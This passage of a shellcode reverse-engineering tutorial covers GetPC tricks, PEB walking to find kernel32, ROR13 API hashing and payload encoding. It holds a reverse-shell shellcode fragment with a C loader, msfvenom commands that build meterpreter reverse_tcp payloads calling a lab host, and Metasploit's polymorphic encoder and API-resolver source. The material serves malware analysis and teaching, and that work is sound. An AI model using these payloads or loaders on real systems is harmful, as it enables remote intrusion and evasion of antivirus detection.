"\xc0\x75\x14\x68\x88\x13\x00\x00\x68\x44\xf0\x35\xe0\xff\xd5"
"\x4f\x75\xe1\xe8\x4c\x00\x00\x00\x6a\x40\x68\x00\x10\x00\x00"
"\x68\x00\x00\x40\x00\x53\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53"
"\x53\x89\xe7\x57\x68\x00\x20\x00\x00\x53\x56\x68\x12\x96\x89"
"\xe2\xff\xd5\x85\xc0\x74\xcf\x8b\x07\x01\xc3\x85\xc0\x75\xe5"
"\x58\xc3\x5f\xe8\x7f\xff\xff\xff\x31\x39\x32\x2e\x31\x36\x38"
"\x2e\x32\x30\x34\x2e\x31\x32\x38\x00\xbb\xf0\xb5\xa2\x56\x6a"
"\x00\x53\xff\xd5";

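int main(void)
{
    /* Allocate an RWX buffer, copy the shellcode into it, and jump to it. */
    LPVOID Memory = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (Memory == NULL)
        return 1;
    memcpy(Memory, shellcode, sizeof(shellcode));
    ((void(*)())Memory)();
    return 0;
}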

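After building the executable, debug it in IDA or x32dbg. When execution reaches the instruction after pop edi, the shellcode has already used the call/pop technique to load the pointer to the URL into the edi register.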

edi.png

ws.png
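The same trick can be read straight out of the dump. Near the end of the generated bytes, `\x5f\xe8\x7f\xff\xff\xff` is `pop edi` followed by `call got_server_host`, and the bytes right after that call are the host string. The sketch below takes that fragment (copied from the dump above) and recovers the string the call leaves a pointer to. The helper name `string_after_call` is an assumption for this example.

```python
import struct

def string_after_call(code, call_offset):
    """Return (string, rel32) for a `call rel32` followed by a NUL-terminated string."""
    if code[call_offset] != 0xE8:
        raise ValueError("expected a call rel32 (opcode 0xE8)")
    (rel32,) = struct.unpack_from("<i", code, call_offset + 1)
    start = call_offset + 5              # the pushed return address points here
    end = code.index(b"\x00", start)     # string runs up to its terminator
    return code[start:end].decode("ascii"), rel32

# pop edi ; call got_server_host ; db "192.168.204.128", 0
fragment = bytes.fromhex("5fe87fffffff3139322e3136382e3230342e31323800")

host, displacement = string_after_call(fragment, 1)
print(host, displacement)
```

The negative displacement shows the call jumping backwards into the stager, where the pushed return address is consumed as the server-name argument instead of being returned to.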

Using the fnstenv instruction

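The x87 floating-point unit (FPU) provides a separate execution environment within the ordinary x86 architecture. It has its own set of special-purpose registers, which the operating system must save on a context switch when a process is using the FPU for floating-point arithmetic. The figure below shows the 28-byte structure used by the fstenv and fnstenv instructions; when executing in 32-bit protected mode, this structure is used to store the FPU state to memory.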

fpu.png

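The only field that matters here is fpu_instruction_pointer, at byte offset 12. It holds the address of the last CPU instruction that used the FPU, and it gives an exception handler the context it needs to identify which FPU instruction may have caused a fault. The field is needed because the FPU runs in parallel with the CPU: if the FPU raises an exception, the exception handler cannot identify the faulting instruction simply by looking at the interrupt return address.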

fsp1.png

fsp2.png

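The fldz instruction at marker 1 pushes the floating-point value 0.0 onto the FPU stack. Inside the FPU, fpu_instruction_pointer is updated to point to the fldz instruction. The fnstenv instruction that follows stores the FpuSaveState structure on the stack at [esp-0x0c], which lets the shellcode then execute a pop that loads fpu_instruction_pointer into EBX. Once the pop has executed, EBX holds a value that points to the location of the fldz instruction in memory, and the shellcode starts using EBX as a base register to access the data embedded in the code.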
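The reason for the 0x0c displacement is plain arithmetic: the structure starts at esp - 12 and fpu_instruction_pointer sits at offset 12, so that field lands exactly at [esp]. The sketch below models this with a dictionary standing in for stack memory. Apart from fpu_instruction_pointer, the field names, the sample register values, and the function names are assumptions made for illustration.

```python
import struct

# Seven 32-bit slots make up the 28-byte environment in 32-bit protected mode.
# Only fpu_instruction_pointer comes from the text; the other names are labels.
FPU_ENV_FORMAT = "<7I"
FPU_ENV_FIELDS = (
    "control_word", "status_word", "tag_word",
    "fpu_instruction_pointer", "fpu_instruction_selector",
    "fpu_operand_pointer", "fpu_operand_selector",
)

def field_offset(name):
    """Byte offset of a field inside the saved environment."""
    return FPU_ENV_FIELDS.index(name) * 4

def emulate_fnstenv_pop(esp, fldz_address):
    """Model `fnstenv [esp-0xc]` followed by `pop ebx`; return (ebx, new_esp)."""
    store_base = esp - 0x0C
    env = struct.pack(FPU_ENV_FORMAT, 0x037F, 0, 0xFFFF, fldz_address, 0, 0, 0)
    memory = {store_base + i: b for i, b in enumerate(env)}  # fake stack memory
    popped = bytes(memory[esp + i] for i in range(4))        # pop reads [esp]
    return struct.unpack("<I", popped)[0], esp + 4

ebx, new_esp = emulate_fnstenv_pop(esp=0x0012FF00, fldz_address=0x00401000)
print(struct.calcsize(FPU_ENV_FORMAT), field_offset("fpu_instruction_pointer"))
print(f"ebx = {ebx:#010x}, esp = {new_esp:#010x}")
```

Everything the structure wrote below the original esp is simply left behind as dead stack data once the pop has run.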

The shikata_ga_nai encoder in msfvenom relies on the same principle.

Link: https://github.com/rapid7/metasploit-framework/blob/master/modules/encoders/x86/shikata_ga_nai.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'rex/poly'

class MetasploitModule < Msf::Encoder::XorAdditiveFeedback

  # The shikata encoder has an excellent ranking because it is polymorphic.
  # Party time, excellent!
  Rank = ExcellentRanking

  def initialize
    super(
      'Name'             => 'Polymorphic XOR Additive Feedback Encoder',
      'Description'      => %q{
        This encoder implements a polymorphic XOR additive feedback encoder.
        The decoder stub is generated based on dynamic instruction
        substitution and dynamic block ordering.  Registers are also
        selected dynamically.
      },
      'Author'           => 'spoonm',
      'Arch'             => ARCH_X86,
      'License'          => MSF_LICENSE,
      'Decoder'          =>
        {
          'KeySize'    => 4,
          'BlockSize'  => 4
        })
  end

  #
  # Generates the shikata decoder stub.
  #
  def decoder_stub(state)

    # If the decoder stub has not already been generated for this state, do
    # it now.  The decoder stub method may be called more than once.
    if (state.decoder_stub == nil)

      # Sanity check that saved_registers doesn't overlap with modified_registers
      if (modified_registers & saved_registers).length > 0
        raise BadGenerateError
      end

      # Shikata will only cut off the last 1-4 bytes of it's own end
      # depending on the alignment of the original buffer
      cutoff = 4 - (state.buf.length & 3)
      block = generate_shikata_block(state, state.buf.length + cutoff, cutoff) || (raise BadGenerateError)

      # Set the state specific key offset to wherever the XORK ended up.
      state.decoder_key_offset = block.index('XORK')

      # Take the last 1-4 bytes of shikata and prepend them to the buffer
      # that is going to be encoded to make it align on a 4-byte boundary.
      state.buf = block.slice!(block.length - cutoff, cutoff) + state.buf

      # Cache this decoder stub.  The reason we cache the decoder stub is
      # because we need to ensure that the same stub is returned every time
      # for a given encoder state.
      state.decoder_stub = block
    end

    state.decoder_stub
  end

  # Indicate that this module can preserve some registers
  def can_preserve_registers?
    true
  end

  # A list of registers always touched by this encoder
  def modified_registers
    # ESP is assumed and is handled through preserves_stack?
    [
      # The counter register is hardcoded
      Rex::Arch::X86::ECX,
      # These are modified by div and mul operations
      Rex::Arch::X86::EAX, Rex::Arch::X86::EDX
    ]
  end

  # Always blacklist these registers in our block generation
  def block_generator_register_blacklist
    [Rex::Arch::X86::ESP, Rex::Arch::X86::ECX] | saved_registers
  end

protected

  #
  # Returns the set of FPU instructions that can be used for the FPU block of
  # the decoder stub.
  #
  def fpu_instructions
    fpus = []

    0xe8.upto(0xee) { |x| fpus << "\xd9" + x.chr }
    0xc0.upto(0xcf) { |x| fpus << "\xd9" + x.chr }
    0xc0.upto(0xdf) { |x| fpus << "\xda" + x.chr }
    0xc0.upto(0xdf) { |x| fpus << "\xdb" + x.chr }
    0xc0.upto(0xc7) { |x| fpus << "\xdd" + x.chr }

    fpus << "\xd9\xd0"
    fpus << "\xd9\xe1"
    fpus << "\xd9\xf6"
    fpus << "\xd9\xf7"
    fpus << "\xd9\xe5"

    # This FPU instruction seems to fail consistently on Linux
    #fpus << "\xdb\xe1"

    fpus
  end

  #
  # Returns a polymorphic decoder stub that is capable of decoding a buffer
  # of the supplied length and encodes the last cutoff bytes of itself.
  #
  def generate_shikata_block(state, length, cutoff)
    # Declare logical registers
    count_reg = Rex::Poly::LogicalRegister::X86.new('count', 'ecx')
    addr_reg  = Rex::Poly::LogicalRegister::X86.new('addr')
    key_reg = nil

    if state.context_encoding
      key_reg = Rex::Poly::LogicalRegister::X86.new('key', 'eax')
    else
      key_reg = Rex::Poly::LogicalRegister::X86.new('key')
    end

    # Declare individual blocks
    endb = Rex::Poly::SymbolicBlock::End.new

    # Clear the counter register
    clear_register = Rex::Poly::LogicalBlock.new('clear_register',
      "\x31\xc9",  # xor ecx,ecx
      "\x29\xc9",  # sub ecx,ecx
      "\x33\xc9",  # xor ecx,ecx
      "\x2b\xc9")  # sub ecx,ecx

    # Initialize the counter after zeroing it
    init_counter = Rex::Poly::LogicalBlock.new('init_counter')

    # Divide the length by four but ensure that it aligns on a block size
    # boundary (4 byte).
    length += 4 + (4 - (length & 3)) & 3
    length /= 4

    if (length <= 255)
      init_counter.add_perm("\xb1" + [ length ].pack('C'))
    elsif (length <= 65536)
      init_counter.add_perm("\x66\xb9" + [ length ].pack('v'))
    else
      init_counter.add_perm("\xb9" + [ length ].pack('V'))
    end

    # Key initialization block
    init_key = nil

    # If using context encoding, we use a mov reg, [addr]
    if state.context_encoding
      init_key = Rex::Poly::LogicalBlock.new('init_key',
        Proc.new { |b| (0xa1 + b.regnum_of(key_reg)).chr + 'XORK'})
    # Otherwise, we do a direct mov reg, val
    else
      init_key = Rex::Poly::LogicalBlock.new('init_key',
        Proc.new { |b| (0xb8 + b.regnum_of(key_reg)).chr + 'XORK'})
    end

    xor  = Proc.new { |b| "\x31" + (0x40 + b.regnum_of(addr_reg) + (8 * b.regnum_of(key_reg))).chr }
    add  = Proc.new { |b| "\x03" + (0x40 + b.regnum_of(addr_reg) + (8 * b.regnum_of(key_reg))).chr }

    sub4 = Proc.new { |b| sub_immediate(b.regnum_of(addr_reg), -4) }
    add4 = Proc.new { |b| add_immediate(b.regnum_of(addr_reg), 4) }

    if (datastore["BufferRegister"])

      buff_reg = Rex::Poly::LogicalRegister::X86.new('buff', datastore["BufferRegister"])
      offset = (datastore["BufferOffset"] ? datastore["BufferOffset"].to_i : 0)
      if ((offset < -255 or offset > 255) and state.badchars.include? "\x00")
        raise EncodingError.new("Can't generate NULL-free decoder with a BufferOffset bigger than one byte")
      end
      mov = Proc.new { |b|
        # mov <buff_reg>, <addr_reg>
        "\x89" + (0xc0 + b.regnum_of(addr_reg) + (8 * b.regnum_of(buff_reg))).chr
      }
      add_offset = Proc.new { |b| add_immediate(b.regnum_of(addr_reg), offset) }
      sub_offset = Proc.new { |b| sub_immediate(b.regnum_of(addr_reg), -offset) }

      getpc = Rex::Poly::LogicalBlock.new('getpc')
      getpc.add_perm(Proc.new{ |b| mov.call(b) + add_offset.call(b) })
      getpc.add_perm(Proc.new{ |b| mov.call(b) + sub_offset.call(b) })

      # With an offset of less than four, inc is smaller than or the same size as add
      if (offset > 0 and offset < 4)
        getpc.add_perm(Proc.new{ |b| mov.call(b) + inc(b.regnum_of(addr_reg))*offset })
      elsif (offset < 0 and offset > -4)
        getpc.add_perm(Proc.new{ |b| mov.call(b) + dec(b.regnum_of(addr_reg))*(-offset) })
      end

      # NOTE: Adding a perm with possibly different sizes is normally
      # wrong since it will change the SymbolicBlock::End offset during
      # various stages of generation.  In this case, though, offset is
      # constant throughout the whole process, so it isn't a problem.
      getpc.add_perm(Proc.new{ |b|
        if (offset < -255 or offset > 255)
          # lea addr_reg, [buff_reg + DWORD offset]
          # NOTE: This will generate NULL bytes!
          "\x8d" + (0x80 + b.regnum_of(buff_reg) + (8 * b.regnum_of(addr_reg))).chr + [offset].pack('V')
        elsif (offset > -255 and offset != 0 and offset < 255)
          # lea addr_reg, [buff_reg + byte offset]
          "\x8d" + (0x40 + b.regnum_of(buff_reg) + (8 * b.regnum_of(addr_reg))).chr + [offset].pack('c')
        else
          # lea addr_reg, [buff_reg]
          "\x8d" + (b.regnum_of(buff_reg) + (8 * b.regnum_of(addr_reg))).chr
        end
      })

      # BufferReg+BufferOffset points right at the beginning of our
      # buffer, so in contrast to the fnstenv technique, we don't have to
      # sub off any other offsets.
      xor1 = Proc.new { |b| xor.call(b) + [ (b.offset_of(endb) - cutoff) ].pack('c') }
      xor2 = Proc.new { |b| xor.call(b) + [ (b.offset_of(endb) - 4 - cutoff) ].pack('c') }
      add1 = Proc.new { |b| add.call(b) + [ (b.offset_of(endb) - cutoff) ].pack('c') }
      add2 = Proc.new { |b| add.call(b) + [ (b.offset_of(endb) - 4 - cutoff) ].pack('c') }

    else
      # FPU blocks
      fpu = Rex::Poly::LogicalBlock.new('fpu',
        *fpu_instructions)

      fnstenv = Rex::Poly::LogicalBlock.new('fnstenv',
        "\xd9\x74\x24\xf4")
      fnstenv.depends_on(fpu)

      # Get EIP off the stack
      getpc = Rex::Poly::LogicalBlock.new('getpc',
        Proc.new { |b| (0x58 + b.regnum_of(addr_reg)).chr })
      getpc.depends_on(fnstenv)

      # Subtract the offset of the fpu instruction since that's where eip points after fnstenv
      xor1 = Proc.new { |b| xor.call(b) + [ (b.offset_of(endb) - b.offset_of(fpu) - cutoff) ].pack('c') }
      xor2 = Proc.new { |b| xor.call(b) + [ (b.offset_of(endb) - b.offset_of(fpu) - 4 - cutoff) ].pack('c') }
      add1 = Proc.new { |b| add.call(b) + [ (b.offset_of(endb) - b.offset_of(fpu) - cutoff) ].pack('c') }
      add2 = Proc.new { |b| add.call(b) + [ (b.offset_of(endb) - b.offset_of(fpu) - 4 - cutoff) ].pack('c') }
    end

    # Decoder loop block
    loop_block = Rex::Poly::LogicalBlock.new('loop_block')

    loop_block.add_perm(
      Proc.new { |b| xor1.call(b) + add1.call(b) + sub4.call(b) },
      Proc.new { |b| xor1.call(b) + sub4.call(b) + add2.call(b) },
      Proc.new { |b| sub4.call(b) + xor2.call(b) + add2.call(b) },
      Proc.new { |b| xor1.call(b) + add1.call(b) + add4.call(b) },
      Proc.new { |b| xor1.call(b) + add4.call(b) + add2.call(b) },
      Proc.new { |b| add4.call(b) + xor2.call(b) + add2.call(b) })

    # Loop instruction block
    loop_inst = Rex::Poly::LogicalBlock.new('loop_inst',
      "\xe2\xf5")
      # In the current implementation the loop block is a constant size,
      # so really no need for a fancy calculation.  Nevertheless, here's
      # one way to do it:
      #Proc.new { |b|
      # # loop <loop_block label>
      # # -2 to account for the size of this instruction
      # "\xe2" + [ -2 - b.size_of(loop_block) ].pack('c')
      #})

    # Define block dependencies
    clear_register.depends_on(getpc)
    init_counter.depends_on(clear_register)
    loop_block.depends_on(init_counter, init_key)
    loop_inst.depends_on(loop_block)

    begin
      # Generate a permutation saving the ECX, ESP, and user defined registers
      loop_inst.generate(block_generator_register_blacklist, nil, state.badchars)
    rescue RuntimeError, EncodingError => e
      # The Rex::Poly block generator can raise RuntimeError variants
      raise EncodingError, e.to_s
    end
  end

  # Convert the SaveRegisters to an array of x86 register constants
  def saved_registers
    Rex::Arch::X86.register_names_to_ids(datastore['SaveRegisters'])
  end

  def sub_immediate(regnum, imm)
    return "" if imm.nil? or imm == 0
    if imm > 255 or imm < -255
      "\x81" + (0xe8 + regnum).chr + [imm].pack('V')
    else
      "\x83" + (0xe8 + regnum).chr + [imm].pack('c')
    end
  end
  def add_immediate(regnum, imm)
    return "" if imm.nil? or imm == 0
    if imm > 255 or imm < -255
      "\x81" + (0xc0 + regnum).chr + [imm].pack('V')
    else
      "\x83" + (0xc0 + regnum).chr + [imm].pack('c')
    end
  end
  def inc(regnum)
    [0x40 + regnum].pack('C')
  end
  def dec(regnum)
    [0x48 + regnum].pack('C')
  end
end

fpu4.png

You can generate shellcode like this for debugging:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.204.128 LPORT=8888 -e x86/shikata_ga_nai -f raw -o re_shell_shikata2.bin

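Manual Symbol Resolution

Shellcode commonly uses LoadLibraryA and GetProcAddress to locate and load functions dynamically. LoadLibraryA loads the specified library and returns a handle. GetProcAddress searches the library's export table for a given symbol name or ordinal. Once shellcode can call these two functions, it can load any library on the system and look up any exported symbol, which gives it full access to the API.

Both functions are exported by kernel32.dll, so the shellcode must do the following:

Find kernel32.dll in memory.
Parse the kernel32.dll PE file and search its exports for LoadLibraryA and GetProcAddress.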

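References

1. A well-known diagram of the important structures

shen.jpg

2. Vergilius Project, a structure lookup site: https://www.vergiliusproject.com/kernels

3. Undocumented Microsoft data structures: http://undocumented.ntinternals.net/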

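Finding kernel32.dll in Memory

To find the base address of kernel32.dll, we follow the chain of data structures shown in Figure 19-1 (only the relevant fields and offsets of each structure are shown).

teb1.png

The walk starts at the TEB, whose address is reachable through the FS segment register. Offset 0x30 in the TEB holds a pointer to the PEB. Offset 0xc in the PEB holds a pointer to the PEB_LDR_DATA structure, which contains the heads of three doubly linked lists of LDR_DATA_TABLE_ENTRY structures, with one entry per loaded module. The DllBase field of the kernel32.dll entry is the value we are looking for.

peb2.jpg

As the figure shows, each list is a closed circular doubly linked list that starts at PEB_LDR_DATA.

In each _LDR_DATA_TABLE_ENTRY node (32-bit layout), the field at offset 0x30 is the buffer pointer of the module name (BaseDllName) and the field at offset 0x18 is DllBase.

Walking the list and comparing the module name string identifies the node that belongs to the target module.

The node's DllBase field gives the address of the module's DOS header. From there, parsing the PE structure leads to the export table, where the address of a specific exported function can be looked up.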
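The export lookup described above can be sketched in Python. This is a minimal illustration, not the code of any particular sample: it assumes a 32-bit PE image laid out as it is in memory (so an RVA can be used directly as an offset into the buffer), it does not handle forwarded exports, and the helper names u16, u32, cstring and find_export are made up for this example. The header offsets are the same ones used by the block_api.asm listing further down (0x3c, 0x78, 0x18, 0x1c, 0x20, 0x24).

```python
import struct


def u16(img, off):
    """Read a little-endian 16-bit value at offset off."""
    return struct.unpack_from("<H", img, off)[0]


def u32(img, off):
    """Read a little-endian 32-bit value at offset off."""
    return struct.unpack_from("<I", img, off)[0]


def cstring(img, off):
    """Read a NUL-terminated ASCII string starting at offset off."""
    end = img.index(b"\x00", off)
    return img[off:end].decode("ascii")


def find_export(img, wanted):
    """Return the RVA of the export named wanted, or None if it is absent.

    img is assumed to be a 32-bit PE image as mapped in memory,
    so every RVA doubles as an offset into img.
    """
    pe = u32(img, 0x3C)                 # IMAGE_DOS_HEADER.e_lfanew
    export_rva = u32(img, pe + 0x78)    # export directory RVA (PE32 layout)
    if export_rva == 0:
        return None                     # module has no export table
    n_names = u32(img, export_rva + 0x18)   # NumberOfNames
    funcs = u32(img, export_rva + 0x1C)     # AddressOfFunctions
    names = u32(img, export_rva + 0x20)     # AddressOfNames
    ords = u32(img, export_rva + 0x24)      # AddressOfNameOrdinals
    for i in range(n_names):
        name = cstring(img, u32(img, names + 4 * i))
        if name == wanted:
            ordinal = u16(img, ords + 2 * i)     # index into the function table
            return u32(img, funcs + 4 * ordinal)
    return None
```

Adding the returned RVA to DllBase gives the function's virtual address. Real shellcode usually compares name hashes instead of the strings themselves, as discussed later in this article.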

findkernel32base.png

Metasploit uses a similar technique.

Link: https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x86/src/block/block_api.asm

;-----------------------------------------------------------------------------;
; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
; Compatible: NT4 and newer
; Architecture: x86
; Size: 140 bytes
;-----------------------------------------------------------------------------;

[BITS 32]

; Input: The hash of the API to call and all its parameters must be pushed onto stack.
; Output: The return value from the API call will be in EAX.
; Clobbers: EAX, ECX and EDX (ala the normal stdcall calling convention)
; Un-Clobbered: EBX, ESI, EDI, ESP and EBP can be expected to remain un-clobbered.
; Note: This function assumes the direction flag has allready been cleared via a CLD instruction.
; Note: This function is unable to call forwarded exports.

api_call:
  pushad                     ; We preserve all the registers for the caller, bar EAX and ECX.
  mov ebp, esp               ; Create a new stack frame
  xor edx, edx               ; Zero EDX
  mov edx, [fs:edx+0x30]     ; Get a pointer to the PEB
  mov edx, [edx+0xc]         ; Get PEB->Ldr
  mov edx, [edx+0x14]        ; Get the first module from the InMemoryOrder module list
next_mod:                    ;
  mov esi, [edx+0x28]        ; Get pointer to modules name (unicode string)
  movzx ecx, word [edx+0x26] ; Set ECX to the length we want to check
  xor edi, edi               ; Clear EDI which will store the hash of the module name
loop_modname:                ;
  xor eax, eax               ; Clear EAX
  lodsb                      ; Read in the next byte of the name
  cmp al, 'a'                ; Some versions of Windows use lower case module names
  jl not_lowercase           ;
  sub al, 0x20               ; If so normalise to uppercase
not_lowercase:               ;
  ror edi, 0xd               ; Rotate right our hash value
  add edi, eax               ; Add the next byte of the name
  dec ecx
  jnz loop_modname           ; Loop until we have read enough
  ; We now have the module hash computed
  push edx                   ; Save the current position in the module list for later
  push edi                   ; Save the current module hash for later
  ; Proceed to iterate the export address table,
  mov edx, [edx+0x10]        ; Get this modules base address
  mov eax, [edx+0x3c]        ; Get PE header
  add eax, edx               ; Add the modules base address
  mov eax, [eax+0x78]        ; Get export tables RVA
  test eax, eax              ; Test if no export address table is present
  jz get_next_mod1           ; If no EAT present, process the next module
  add eax, edx               ; Add the modules base address
  push eax                   ; Save the current modules EAT
  mov ecx, [eax+0x18]        ; Get the number of function names
  mov ebx, [eax+0x20]        ; Get the rva of the function names
  add ebx, edx               ; Add the modules base address
  ; Computing the module hash + function hash
get_next_func:               ;
  test ecx, ecx              ; Changed from jecxz to accomodate the larger offset produced by random jmps below
  jz get_next_mod            ; When we reach the start of the EAT (we search backwards), process the next module
  dec ecx                    ; Decrement the function name counter
  mov esi, [ebx+ecx*4]       ; Get rva of next module name
  add esi, edx               ; Add the modules base address
  xor edi, edi               ; Clear EDI which will store the hash of the function name
  ; And compare it to the one we want
loop_funcname:               ;
  xor eax, eax               ; Clear EAX
  lodsb                      ; Read in the next byte of the ASCII function name
  ror edi, 0xd               ; Rotate right our hash value
  add edi, eax               ; Add the next byte of the name
  cmp al, ah                 ; Compare AL (the next byte from the name) to AH (null)
  jne loop_funcname          ; If we have not reached the null terminator, continue
  add edi, [ebp-8]           ; Add the current module hash to the function hash
  cmp edi, [ebp+0x24]        ; Compare the hash to the one we are searchnig for
  jnz get_next_func          ; Go compute the next function hash if we have not found it
  ; If found, fix up stack, call the function and then value else compute the next one...
  pop eax                    ; Restore the current modules EAT
  mov ebx, [eax+0x24]        ; Get the ordinal table rva
  add ebx, edx               ; Add the modules base address
  mov cx, [ebx+2*ecx]        ; Get the desired functions ordinal
  mov ebx, [eax+0x1c]        ; Get the function addresses table rva
  add ebx, edx               ; Add the modules base address
  mov eax, [ebx+4*ecx]       ; Get the desired functions RVA
  add eax, edx               ; Add the modules base address to get the functions actual VA
  ; We now fix up the stack and perform the call to the desired function...
finish:
  mov [esp+0x24], eax        ; Overwrite the old EAX value with the desired api address for the upcoming popad
  pop ebx                    ; Clear off the current modules hash
  pop ebx                    ; Clear off the current position in the module list
  popad                      ; Restore all of the callers registers, bar EAX, ECX and EDX which are clobbered
  pop ecx                    ; Pop off the origional return address our caller will have pushed
  pop edx                    ; Pop off the hash value our caller will have pushed
  push ecx                   ; Push back the correct return value
  jmp eax                    ; Jump into the required function
  ; We now automagically return to the correct caller...
get_next_mod:                ;
  pop eax                    ; Pop off the current (now the previous) modules EAT
get_next_mod1:               ;
  pop edi                    ; Pop off the current (now the previous) modules hash
  pop edx                    ; Restore our position in the module list
  mov edx, [edx]             ; Get the next module
  jmp next_mod               ; Process this module

You can generate shellcode with msfvenom to see how this is implemented in shellcode used by real malware:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.204.128 LPORT=8888 -f raw -o re_shell.bin

rs_sc.png

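Using Hashed Exported Names

How do we find the specific function we want? One solution is to compute a hash of each symbol string and compare the result with a precomputed value stored in the shellcode. The hash function does not need to be sophisticated; it only needs to guarantee that the hashes are unique within each DLL that the shellcode uses. Hash collisions between symbols in different DLLs, and between symbols the shellcode does not use, are acceptable.

The most common hash function is the 32-bit rotate-right-additive hash.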
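As a rough sketch of that hash in Python: the rotation count of 13 (0xd) matches the ror edi, 0xd instruction in the block_api.asm listing above, while the function names ror32 and ror13_hash are made up for this example. This version hashes only the name bytes and stops before the NUL terminator. Metasploit's block_api also runs the terminator through the loop and adds a hash of the module name, so its constants differ from the values produced here.

```python
def ror32(value: int, count: int) -> int:
    """Rotate a 32-bit value right by count bits."""
    count %= 32
    return ((value >> count) | (value << (32 - count))) & 0xFFFFFFFF


def ror13_hash(name: str) -> int:
    """32-bit rotate-right-additive hash of an ASCII symbol name."""
    h = 0
    for byte in name.encode("ascii"):
        # Rotate the running hash right by 13, then add the next character.
        h = (ror32(h, 13) + byte) & 0xFFFFFFFF
    return h


print(hex(ror13_hash("LoadLibraryA")))  # 0xec0e4e8e
```

When analyzing shellcode, precomputing this hash for every export of the DLLs in question and looking up the constants found in the code is usually enough to recover the imported function names.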

hashstring.png

Here is the same technique as implemented in Metasploit:

Link: https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x86/src/block/block_api.asm

ror.png

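Shellcode Encoding

In real-world use, shellcode almost always has to be encoded in some way. For example, if a program performs basic filtering on its input, the shellcode must get past that filter. This means the shellcode usually has to look like legitimate data in order to be accepted by the vulnerable program.

If the program uses strcpy or strcat and the exploit relies on those functions to read or copy the malicious payload into the target buffer, the shellcode cannot contain NULL (0x00) bytes, because they would truncate the data.

The program may also perform additional sanity checks that the shellcode must pass:

All bytes are printable ASCII bytes (less than 0x80).
All bytes are alphanumeric (A through Z, a through z, or 0 through 9).

Common encoding techniques include:

XOR every payload byte with a constant byte mask. Remember that for all values a and b of the same size, (a XOR b) XOR b == a.
Use an alphabetic transform in which each payload byte is split into two 4-bit nibbles, and each nibble is added to a printable ASCII character (such as A or a).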
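Both transforms are easy to reproduce when decoding a sample by hand. The following is a minimal Python sketch under stated assumptions: the key 0xE7 and the base character A are arbitrary illustrative choices, the function names are invented for this example, and the sample bytes are placeholders rather than real shellcode.

```python
def xor_encode(payload: bytes, key: int) -> bytes:
    """XOR every byte with a constant one-byte key (the same call decodes)."""
    return bytes(b ^ key for b in payload)


def alpha_encode(payload: bytes, base: int = ord("A")) -> bytes:
    """Split each byte into two nibbles and add each nibble to a base character."""
    out = bytearray()
    for b in payload:
        out.append(base + (b >> 4))     # high nibble
        out.append(base + (b & 0x0F))   # low nibble
    return bytes(out)


def alpha_decode(encoded: bytes, base: int = ord("A")) -> bytes:
    """Inverse of alpha_encode: recombine each pair of characters into one byte."""
    pairs = zip(encoded[0::2], encoded[1::2])
    return bytes(((hi - base) << 4) | (lo - base) for hi, lo in pairs)


sample = bytes([0x00, 0x41, 0xFF])           # placeholder bytes
print(xor_encode(sample, 0xE7).hex())        # e7a618
print(alpha_encode(sample))                  # b'AAEBPP'
assert xor_encode(xor_encode(sample, 0xE7), 0xE7) == sample
assert alpha_decode(alpha_encode(sample)) == sample
```

Note that the XOR output contains no 0x00 byte only if the key does not appear in the payload, and that the alphabetic transform doubles the payload size in exchange for output restricted to the letters A through P.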

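Encoding has further benefits for the attacker: by hiding human-readable strings such as URLs or IP addresses, it makes analysis harder (otherwise a simple strings command is enough to pull the readable strings out of a sample). Encoding can also help shellcode evade network intrusion detection systems.

msfvenom's encoders can be used for this. Many of them are XOR-based: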

┌──(root💀kali)-[/home/kali]
└─# msfvenom -l encoder             

Framework Encoders [--encoder <value>]
======================================

    Name                       Rank       Description
    ----                       ----       -----------
    cmd/brace                  low        Bash Brace Expansion Command Encoder
    cmd/echo                   good       Echo Command Encoder
    cmd/generic_sh             manual     Generic Shell Variable Substitution Command Encoder
    cmd/ifs                    low        Bourne ${IFS} Substitution Command Encoder
    cmd/perl                   normal     Perl Command Encoder
    cmd/powershell_base64      excellent  Powershell Base64 Command Encoder
    cmd/printf_php_mq          manual     printf(1) via PHP magic_quotes Utility Command Encoder
    generic/eicar              manual     The EICAR Encoder
    generic/none               normal     The "none" Encoder
    mipsbe/byte_xori           normal     Byte XORi Encoder
    mipsbe/longxor             normal     XOR Encoder
    mipsle/byte_xori           normal     Byte XORi Encoder
    mipsle/longxor             normal     XOR Encoder
    php/base64                 great      PHP Base64 Encoder
    ppc/longxor                normal     PPC LongXOR Encoder
    ppc/longxor_tag            normal     PPC LongXOR Encoder
    ruby/base64                great      Ruby Base64 Encoder
    sparc/longxor_tag          normal     SPARC DWORD XOR Encoder
    x64/xor                    normal     XOR Encoder
    x64/xor_context            normal     Hostname-based Context Keyed Payload Encoder
    x64/xor_dynamic            normal     Dynamic key XOR Encoder
    x64/zutto_dekiru           manual     Zutto Dekiru
    x86/add_sub                manual     Add/Sub Encoder
    x86/alpha_mixed            low        Alpha2 Alphanumeric Mixedcase Encoder
    x86/alpha_upper            low        Alpha2 Alphanumeric Uppercase Encoder
    x86/avoid_underscore_tolower  manual  Avoid underscore/tolower
    x86/avoid_utf8_tolower     manual     Avoid UTF8/tolower
    x86/bloxor                 manual     BloXor - A Metamorphic Block Based XOR Encoder
    x86/bmp_polyglot           manual     BMP Polyglot
    x86/call4_dword_xor        normal     Call+4 Dword XOR Encoder
    x86/context_cpuid          manual     CPUID-based Context Keyed Payload Encoder
    x86/context_stat           manual     stat(2)-based Context Keyed Payload Encoder
    x86/context_time           manual     time(2)-based Context Keyed Payload Encoder
    x86/countdown              normal     Single-byte XOR Countdown Encoder
    x86/fnstenv_mov            normal     Variable-length Fnstenv/mov Dword XOR Encoder
    x86/jmp_call_additive      normal     Jump/Call XOR Additive Feedback Encoder
    x86/nonalpha               low        Non-Alpha Encoder
    x86/nonupper               low        Non-Upper Encoder
    x86/opt_sub                manual     Sub Encoder (optimised)
    x86/service                manual     Register Service
    x86/shikata_ga_nai         excellent  Polymorphic XOR Additive Feedback Encoder
    x86/single_static_bit      manual     Single Static Bit
